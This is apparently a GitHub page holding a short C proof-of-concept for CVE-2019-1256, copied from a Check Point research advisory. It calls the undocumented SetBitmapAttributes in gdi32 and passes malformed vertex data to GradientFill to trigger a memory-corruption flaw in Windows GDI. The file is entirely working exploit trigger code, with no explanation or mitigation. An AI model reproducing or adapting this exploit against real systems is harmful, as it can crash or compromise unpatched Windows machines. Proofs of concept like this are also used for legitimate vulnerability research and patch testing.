-
Notifications
You must be signed in to change notification settings - Fork 19
/
CVE-2019-1256
22 lines (18 loc) · 946 Bytes
/
CVE-2019-1256
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
//Copy From https://cpr-zero.checkpoint.com/vulns/cprid-2137/
#include <windows.h>
HBITMAP(*SetBitmapAttributesStub)(HBITMAP, int);
int main()
{
LoadLibraryA("user32.dll");
HMODULE gdi = LoadLibraryA("gdi32.dll");
SetBitmapAttributesStub = GetProcAddress(gdi, "SetBitmapAttributes");
HDC hdc1 = CreateCompatibleDC(0x0);
HBITMAP hbm1 = CreateBitmap(0x10001, 0x9, 0x0, 0x0, 0x0);
HBITMAP hbm2 = SetBitmapAttributesStub(hbm1, 0x1);
SelectObject(hdc1, hbm2);
TRIVERTEX vert[7] = { { 0xc9b, 0xfff, 0x3, 0x5, 0x8, 0x10001 }, { 0x8, 0x4, 0x8, 0x1, 0x3, 0xffffffff80000000 },
{ 0x1, 0xffffffffffffffc1, 0x3, 0x8000, 0x3000000000, 0x2630 }, { 0x7ff, 0x2, 0x0, 0x3, 0x4 },
{ 0x5, 0x4, 0x1, 0x8001, 0x7ff, 0x5 }, { 0x100000000, 0x5, 0x0, 0x8000, 0x9, 0x9 }, { 0 } };
GRADIENT_RECT rect[2] = { { 0x3, 0x7 } };
GradientFill(hdc1, &vert, 0x7, &rect, 0x1, 0x0);
}